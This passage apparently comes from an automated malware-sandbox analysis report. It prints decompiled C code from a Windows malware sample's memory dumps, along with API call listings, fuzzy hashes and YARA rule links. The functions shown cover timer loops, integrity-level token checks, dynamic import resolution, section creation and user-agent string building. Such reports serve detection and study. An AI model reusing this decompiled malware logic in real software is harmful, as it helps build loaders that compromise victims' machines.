					_v80 = _t75;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0xd9d26c; // 0x2fc
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0xd9d24c = 5;
						} else {
							_t68 = E00D96A7F(); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0xd9d260 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t73 = _v104.LowPart;
						_t58 = _t73 << 4;
						_t78 = _t89 + (_t73 << 4) + 0x3c;
						_t74 = _t73 + 1;
						_v92.LowPart = _t73 + 1;
						_t60 = E00D95B7A(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
						_v128.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v92;
						_v104.LowPart = _t65;
						_t97 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v120 = E00D98155(_t74, _t97,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xd9d244);
							goto L21;
						} else {
							__eflags =  *0xd9d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E00D95225();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xd9d248);
								L21:
								L00D9AE98();
								_v104.LowPart = _t60;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t72 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0xd9d238, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t72 = _t72 - 1;
					} while (_t72 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}

0x00d96130
0x00d96146
0x00d9614a
0x00d9614f
0x00d96156
0x00d9615c
0x00d96162
0x00d962ea
0x00d96168
0x00d96168
0x00d9616a
0x00d9616f
0x00d96170
0x00d96176
0x00d9617a
0x00d9617e
0x00d9618c
0x00d9619a
0x00d9619e
0x00d961a0
0x00d961ad
0x00d961b9
0x00d961bb
0x00d961c1
0x00d961ca
0x00d961d5
0x00d961d5
0x00d961cc
0x00d961cc
0x00d961d3
0x00000000
0x00000000
0x00d961d3
0x00d961df
0x00000000
0x00d961e3
0x00d961e8
0x00d961f3
0x00d961f3
0x00d961fb
0x00d96206
0x00d9620e
0x00d96217
0x00d9621a
0x00d9621e
0x00d96223
0x00d96229
0x00000000
0x00000000
0x00d9622b
0x00d9622f
0x00d96233
0x00d96236
0x00000000
0x00d96238
0x00d96248
0x00d96248
0x00000000
0x00d96279
0x00d96279
0x00d9627e
0x00d9629d
0x00d9629f
0x00d962a4
0x00d962a5
0x00000000
0x00d96280
0x00d96280
0x00d96286
0x00000000
0x00d96288
0x00d96288
0x00d9628d
0x00d9628f
0x00d96294
0x00d96295
0x00d962ab
0x00d962ab
0x00d962b3
0x00d962c1
0x00d962c5
0x00d962d1
0x00d962d3
0x00d962d7
0x00d962d9
0x00000000
0x00d962df
0x00000000
0x00d962df
0x00d962d9
0x00d96286
0x00000000
0x00d9627e
0x00d9624c
0x00d9624e
0x00d96252
0x00d96253
0x00d96253
0x00d96257
0x00d96261
0x00d96261
0x00d96267
0x00d9626a
0x00d9626a
0x00d96271
0x00d96271
0x00d962f8
0x00000000

APIs

memset.NTDLL ref: 00D9614A
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00D96156
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 00D9617E
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00D9619E
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,00D92051,?), ref: 00D961B9
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00D92051,?,00000000), ref: 00D96261
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00D92051,?,00000000,?,?), ref: 00D96271
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00D962AB
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 00D962C5
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00D962D1

Part of subcall function 00D96A7F: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04BD9358,00000000,?,747DF710,00000000,747DF730), ref: 00D96ACE
Part of subcall function 00D96A7F: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04BD9390,?,00000000,30314549,00000014,004F0053,04BD934C), ref: 00D96B6B
Part of subcall function 00D96A7F: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00D961D1), ref: 00D96B7D

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00D92051,?,00000000,?,?), ref: 00D962E4

Strings

Uxt, xrefs: 00D96261

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID: Uxt
API String ID: 3521023985-1536154274
Opcode ID: af571eafac403cf7024634a50f2becb39307bcf5b6790fe64cffe530182fee02
Instruction ID: cebcdc51dddc142b205f1d5a82c0db1bbef5999cdf7bc311b22da06de3513014
Opcode Fuzzy Hash: af571eafac403cf7024634a50f2becb39307bcf5b6790fe64cffe530182fee02
Instruction Fuzzy Hash: 67515E71509320AFCB11AF15DC44DABBBE8EF85764F548A1AF8A8D2260D770C904CFB6

Uniqueness

Uniqueness Score: -1.00%

Function 00511815, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x514108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x51410c;
						if( *0x51410c != 0) {
							_t36 = 0x2710;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x514118;
								if( *0x514118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x51410c);
						}
						HeapDestroy( *0x514110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x514108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x514110 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x514130 = _a4;
							asm("lock xadd [eax], ebx");
							_t23 = CreateThread(0, 0, E00511EFF, E0051122C(_a12, 0, 0x514118, _t41), 0,  &_a8); // executed
							 *0x51410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x00511818
0x00511824
0x00511826
0x00511829
0x005118a3
0x005118a9
0x005118ab
0x005118ad
0x005118b3
0x005118b5
0x005118ba
0x005118bd
0x005118c8
0x005118ca
0x00000000
0x00000000
0x005118cc
0x005118cf
0x005118d1
0x00000000
0x00000000
0x00000000
0x005118d1
0x005118d9
0x005118d9
0x005118e5
0x005118e5
0x0051182b
0x0051182c
0x0051184c
0x00511852
0x00511857
0x00511859
0x00511899
0x00511899
0x0051185b
0x00511863
0x0051186a
0x00511883
0x00511889
0x00511890
0x00511895
0x00000000
0x00511895
0x00511890
0x00511859
0x0051182c
0x005118f2

APIs

InterlockedIncrement.KERNEL32(00514108), ref: 00511837
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0051184C
CreateThread.KERNEL32 ref: 00511883
InterlockedDecrement.KERNEL32(00514108), ref: 005118A3
SleepEx.KERNEL32(00000064,00000001), ref: 005118BD
CloseHandle.KERNEL32 ref: 005118D9
HeapDestroy.KERNEL32 ref: 005118E5

Strings

Txt, xrefs: 0051184C

Memory Dump Source

Source File: 00000001.00000002.599968385.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true

Associated: 00000001.00000002.599974897.0000000000515000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.599996450.0000000000517000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
String ID: Txt
API String ID: 3416589138-4033135041
Opcode ID: 07ac6bba8f87a3d082576976ce7b431c8f27b03b4544b4b78a0e42369b0a125e
Instruction ID: 46359ee08fcc1f2f7e25e80c6b6ae022dcc3eaa518e2791948fd876d74407587
Opcode Fuzzy Hash: 07ac6bba8f87a3d082576976ce7b431c8f27b03b4544b4b78a0e42369b0a125e
Instruction Fuzzy Hash: FD219D71A40604BBE7109FA9AC889EA7FB8F7A9750710C565FA01E3150D3308DC4EF64

Uniqueness

Uniqueness Score: -1.00%

Function 00D98492, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00D98492(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00D9AE92();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xd9d2a4; // 0x3e3a5a8
				_t5 = _t13 + 0xd9e836; // 0x4bd8dde
				_t6 = _t13 + 0xd9e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00D9AB2A();
				_t17 = CreateFileMappingW(0xffffffff, 0xd9d2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x00d98492
0x00d9849a
0x00d9849e
0x00d984a4
0x00d984a9
0x00d984ae
0x00d984b1
0x00d984b4
0x00d984b9
0x00d984ba
0x00d984bd
0x00d984c2
0x00d984c9
0x00d984d3
0x00d984d5
0x00d984d6
0x00d984d9
0x00d984f5
0x00d984fb
0x00d984ff
0x00d9854d
0x00d98501
0x00d9850e
0x00d9851e
0x00d98526
0x00d98538
0x00d9853c
0x00000000
0x00000000
0x00d98528
0x00d9852b
0x00d98530
0x00d98532
0x00d98532
0x00d98510
0x00d98512
0x00d9853e
0x00d9853f
0x00d9853f
0x00d9850e
0x00d98554

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,00D91F23,?,?,4D283A53,?,?), ref: 00D9849E
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00D984B4
_snwprintf.NTDLL ref: 00D984D9
CreateFileMappingW.KERNELBASE(000000FF,00D9D2A8,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 00D984F5
GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,00D91F23,?,?,4D283A53,?), ref: 00D98507
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00D9851E
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,00D91F23,?,?,4D283A53), ref: 00D9853F
GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,00D91F23,?,?,4D283A53,?), ref: 00D98547

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: 3880455821b4c030e87cff565196da08278c6ac76635f77d348753c8b2399ce9
Instruction ID: f345a5d29e93d4fac3e1a2a0e973b90eee25152dc8be856d42a6213868ab8560
Opcode Fuzzy Hash: 3880455821b4c030e87cff565196da08278c6ac76635f77d348753c8b2399ce9
Instruction Fuzzy Hash: 7421B772600304FBCB51EBA8DC06F9E77A9AB45B50F254122F619E72D0EB70D9099B70

Uniqueness

Uniqueness Score: -1.00%

Function 00D94800, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D94800(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xd9d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00D96D10(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00D945B3(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x00d9480d
0x00d94814
0x00d9481b
0x00d9482f
0x00d9483a
0x00d94852
0x00d9485f
0x00d94862
0x00d94867
0x00d94872
0x00d94876
0x00d94885
0x00d94889
0x00d948a5
0x00d948a5
0x00d948a9
0x00d948a9
0x00d948ae
0x00d948b2
0x00d948b8
0x00d948b9
0x00d948c0
0x00d948c6

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00D94832
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 00D94852
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00D94862
CloseHandle.KERNEL32(00000000), ref: 00D948B2

Part of subcall function 00D96D10: RtlAllocateHeap.NTDLL(00000000,-00000008,00D95D29), ref: 00D96D1C

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 00D94885
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00D9488D
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00D9489D

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 4b9c959e73b8ecd5271ef49b2ed4c06cfda8e467343592f9ffc911861dcaab53
Instruction ID: b758ef2961926951d14cfb110fb0b3e1a6632d8278673555f430d16da3b0d95f
Opcode Fuzzy Hash: 4b9c959e73b8ecd5271ef49b2ed4c06cfda8e467343592f9ffc911861dcaab53
Instruction Fuzzy Hash: 39213D75900258FFEF009F94DC84DAEBBB9EB44304F100066F910A6261C7718E05DF70

Uniqueness

Uniqueness Score: -1.00%

Function 00D93DCD, Relevance: 9.2, APIs: 6, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00D93E08
IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 00D93E8B
StrStrIW.SHLWAPI(00000000,006E0069), ref: 00D93ECB
SysFreeString.OLEAUT32(00000000), ref: 00D93EED

Part of subcall function 00D94B71: SysAllocString.OLEAUT32(00D9C298), ref: 00D94BC1

SafeArrayDestroy.OLEAUT32(00000000), ref: 00D93F40
SysFreeString.OLEAUT32(00000000), ref: 00D93F4F

Part of subcall function 00D93B9B: Sleep.KERNELBASE(000001F4), ref: 00D93BE3

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
String ID:
API String ID: 2118684380-0
Opcode ID: f65bb80021e56c9f6bf0b40c6b488d96502d007f127087aecb93e6d709fd86ef
Instruction ID: 5be6a0977c0aaa2fea9e102843589ab6573e715a3697ec607fb89a1e91052d1e
Opcode Fuzzy Hash: f65bb80021e56c9f6bf0b40c6b488d96502d007f127087aecb93e6d709fd86ef
Instruction Fuzzy Hash: 4651FC35900609EFDB11DFA8C844A9AB7B6FF88744B148969F509DB260DB71DE06CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00511C1F, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00511C1F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t32;
				_Unknown_base(*)()* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E0051163D(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t48 = GetModuleHandleA( *0x514144 + 0x515014);
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48,  *0x514144 + 0x51514c);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00511628(_t54);
					} else {
						_t32 = GetProcAddress(_t48,  *0x514144 + 0x51515c);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t35 = GetProcAddress(_t48,  *0x514144 + 0x51516f);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t38 = GetProcAddress(_t48,  *0x514144 + 0x515184);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t41 = GetProcAddress(_t48,  *0x514144 + 0x51519a);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00511E57(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00511c2e
0x00511c32
0x00511cf4
0x00511c38
0x00511c50
0x00511c5f
0x00511c66
0x00511c68
0x00511c6d
0x00511cec
0x00511ced
0x00511c6f
0x00511c7c
0x00511c7e
0x00511c83
0x00000000
0x00511c85
0x00511c92
0x00511c94
0x00511c99
0x00000000
0x00511c9b
0x00511ca8
0x00511caa
0x00511caf
0x00000000
0x00511cb1
0x00511cbe
0x00511cc0
0x00511cc5
0x00000000
0x00511cc7
0x00511ccd
0x00511cd2
0x00511cd9
0x00511cde
0x00511ce3
0x00000000
0x00511ce5
0x00511ce8
0x00511ce8
0x00511ce3
0x00511cc5
0x00511caf
0x00511c99
0x00511c83
0x00511c6d
0x00511d02

APIs

Part of subcall function 0051163D: HeapAlloc.KERNEL32(00000000,?,0051191A,00000208,?,-00000008,?,?,?,00511F72,?), ref: 00511649

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,0051117B,?,?,?), ref: 00511C44
GetProcAddress.KERNEL32(00000000,?), ref: 00511C66
GetProcAddress.KERNEL32(00000000,?), ref: 00511C7C
GetProcAddress.KERNEL32(00000000,?), ref: 00511C92
GetProcAddress.KERNEL32(00000000,?), ref: 00511CA8
GetProcAddress.KERNEL32(00000000,?), ref: 00511CBE

Part of subcall function 00511E57: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000), ref: 00511EB4
Part of subcall function 00511E57: memset.NTDLL ref: 00511ED6

Memory Dump Source

Source File: 00000001.00000002.599968385.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true

Associated: 00000001.00000002.599974897.0000000000515000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.599996450.0000000000517000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 40952b82e59f342509d9cf49b2cc5260244b34fd4c5eff7cbc5529f034d3736e
Instruction ID: 4dd5688664949c96596a4b4945998375f7ecd6f17fa0cea35f60c42dc7e57d3a
Opcode Fuzzy Hash: 40952b82e59f342509d9cf49b2cc5260244b34fd4c5eff7cbc5529f034d3736e
Instruction Fuzzy Hash: C4214F70680A06AFE711DF69CC84EEABBECBB5430470444A5E545C7211E774ED84CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00D9A5F5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00D9A5F5(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E00D96D10(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0xd9c28c); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0xd9c28c);
						}
						_t2 = _t27 + 0x10; // 0x4d283a53
						 *( *_t2 + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					_t6 = _t27 + 0x10; // 0x4d283a53
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *_t6;
				}
				return 0;
			}

0x00d9a600
0x00d9a604
0x00d9a606
0x00d9a607
0x00d9a60f
0x00d9a60f
0x00d9a613
0x00000000
0x00000000
0x00d9a60a
0x00d9a60b
0x00d9a60e
0x00d9a60e
0x00d9a61b
0x00d9a620
0x00d9a626
0x00d9a62e
0x00d9a634
0x00d9a636
0x00d9a63b
0x00d9a63f
0x00d9a641
0x00d9a644
0x00d9a64b
0x00d9a64b
0x00d9a651
0x00d9a655
0x00d9a658
0x00d9a659
0x00d9a65b
0x00d9a663
0x00d9a667
0x00d9a667
0x00d9a674

APIs

StrChrA.SHLWAPI(?,00000020,00000000,04BD95AC,?,?,?,00D95027,04BD95AC,?,?,?,00D92018,?,?,?), ref: 00D9A60F
StrTrimA.KERNELBASE(?,00D9C28C,00000002,?,?,?,00D95027,04BD95AC,?,?,?,00D92018,?,?,?,4D283A53), ref: 00D9A62E
StrChrA.SHLWAPI(?,00000020,?,?,?,00D95027,04BD95AC,?,?,?,00D92018,?,?,?,4D283A53,?), ref: 00D9A639
StrTrimA.SHLWAPI(00000001,00D9C28C,?,?,?,00D95027,04BD95AC,?,?,?,00D92018,?,?,?,4D283A53,?), ref: 00D9A64B

Strings

S:(M, xrefs: 00D9A651, 00D9A663

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Trim
String ID: S:(M
API String ID: 3043112668-2217774225
Opcode ID: 963450356c45d1c3540d94c66c800cda792ca636e93fd2626fe883b239e7c9eb
Instruction ID: 48682f3f2c398d67d50b78eea214281b161d1c6f3c697acf200c8a91281257dd
Opcode Fuzzy Hash: 963450356c45d1c3540d94c66c800cda792ca636e93fd2626fe883b239e7c9eb
Instruction Fuzzy Hash: A70175726057219FD7219F698C48E2BBF98EB96B90F150519F881D7241DB60C80282F5

Uniqueness

Uniqueness Score: -1.00%

Function 00D91E95, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00D91E95(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E00D94D5D();
				if(_t21 != 0) {
					_t59 =  *0xd9d25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0xd9d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0xd9d164(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E00D986DB( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0xd9d2a4; // 0x3e3a5a8
					if( *0xd9d25c > 5) {
						_t8 = _t26 + 0xd9e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0xd9e9f3; // 0x44283a44
						_t27 = _t7;
					}
					E00D95136(_t27, _t27);
					_t31 = E00D98492(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0xd9d270 =  *0xd9d270 ^ 0x81bbe65d;
						_t32 = E00D96D10(0x60);
						 *0xd9d324 = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0xd9d324; // 0x4bd95b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0xd9d324; // 0x4bd95b0
							 *_t51 = 0xd9e845;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0xd9d238, 0, 0x43);
							 *0xd9d2c4 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0xd9d25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0xd9d2a4; // 0x3e3a5a8
								_t13 = _t58 + 0xd9e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0xd9c28f);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E00D965CE( ~_v8 &  *0xd9d270, 0xd9d00c); // executed
								_t42 = E00D9A22C(0, _t55, _t63, 0xd9d00c); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
